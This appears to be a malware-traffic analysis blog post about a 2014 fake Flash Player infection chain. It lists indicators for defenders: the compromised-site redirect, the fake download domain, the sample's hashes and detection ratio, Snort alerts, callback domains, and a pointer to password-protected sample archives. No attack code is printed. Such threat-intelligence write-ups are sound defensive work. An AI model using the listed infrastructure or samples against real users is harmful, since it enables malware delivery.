2014-04-30 - FAKE FLASH PLAYER FROM 87.98.146.123 - ACTIVEX.ADOBE.FLASH.PLAYER.TRANSDISCIPLINAR.INFO

ASSOCIATED FILES:

NOTES:

 

CHAIN OF EVENTS

COMPROMISED WEBSITE AND REDIRECT:

FAKE FLASH PLAYER PAGE:

POST-INFECTION CALLBACK FROM SANDBOX ANALYSIS:

 

PRELIMINARY MALWARE ANALYSIS

File name:  adobe_flash_player.exe
File size:  13.5 KB ( 13824 bytes )
MD5 hash:  f5f998a2425a559be2d6413d16ad091d
SHA256 hash:  2417424e64f2f1499b3d9dc2c8b5ebde92ffa6aa43984564478000a9775747b3
Detection ratio:  46 / 52
First submission:  2014-04-28 09:47:44 UTC
VirusTotal link:  https://www.virustotal.com/en/file/2417424e64f2f1499b3d9dc2c8b5ebde92ffa6aa43984564478000a9775747b3/analysis/
Malwr link:  https://malwr.com/analysis/ZTM0ZDEwMTg5NzRjNGM4ZTg5YjAyZTFmMjBjOTc4NTc/

 

SNORT EVENTS

SNORT EVENTS FOR THE INFECTION TRAFFIC (from Sguil on Security Onion)

 

NOTE:  Using Security Onion I did tcpreplay on a sandbox analysis PCAP of the malware.  The PCAP generated two different post-infection alerts.

 

SCREENSHOTS FROM THE TRAFFIC

Here's the javascript I've seen from the compromised web sites.  Note the <HTML> and </HTML> tags...  It looks like a separate HTML page before the start of the actual HTML page from the site.

 

That javascript shown above generated the HTTP GET request seen below to pagerank.net.au, which generates traffic to the fake Flash player page on transdisciplinar.info.

 

Here's the GET request for the fake Flash player from activex.adobe.flash.player.transdisciplinar.info

 

Post-infection callback to nonicnic.net

 

Post-infection callback to mobypapp.com mobypapp.com

 

FINAL NOTES

Once again, here are links for the associated files:

ZIP files are password-protected with the standard password.  If you don't know it, look at the "about" page of this website.

Click here to return to the main page.